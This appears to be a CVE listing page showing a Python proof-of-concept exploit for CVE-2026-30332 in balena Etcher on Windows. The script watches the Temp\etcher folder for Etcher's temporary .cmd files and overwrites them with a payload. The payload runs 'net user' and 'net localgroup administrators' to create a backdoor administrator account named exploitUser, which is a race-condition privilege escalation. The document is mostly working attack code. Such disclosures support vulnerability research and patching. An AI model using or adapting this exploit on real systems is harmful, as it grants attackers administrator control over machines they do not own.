5465 Total CVEs
26 Years
GitHub
Home / 2026 / CVE-2026-30332
README.md
Rendering markdown...
POC / exploit.py PY
⬇ Raw GitHub ✕ Close 
import os
import time
import glob

username = os.environ.get("USERNAME")
target_folder = fr"C:\Users\{username}\AppData\Local\Temp\etcher"
file_prefix = "balena-etcher-electron-"
payload = fr'''
chcp 65001
set "ETCHER_SERVER_ADDRESS=127.0.0.1"
set "ETCHER_SERVER_ID=etcher-xxorfp"
set "ETCHER_SERVER_PORT=3435"
set "UV_THREADPOOL_SIZE=128"
set "SKIP=1"
net user exploitUser Password123! /add
net localgroup administrators exploitUser /add
"C:\Users\{username}\AppData\Local\balena_etcher\app-2.1.0\resources\etcher-util.exe"
'''

def monitor_and_replace():
    print(f"[*] Watching for balena-etcher-electron-*.cmd files in: {target_folder}")
    
    while True:
        cmd_files = glob.glob(os.path.join(target_folder, file_prefix + "*.cmd"))
        for cmd_file in cmd_files:
            print(f"[+] New .cmd file detected: {cmd_file}")
            try:
                with open(cmd_file, "w") as f:
                    f.write(payload)
                print("[+] Payload successfully written to .cmd file.")
                return  # Exit after successful injection
            except Exception as e:
                print(f"[-] Failed to write payload: {e}")
        time.sleep(0.5)

if __name__ == "__main__":
    monitor_and_replace()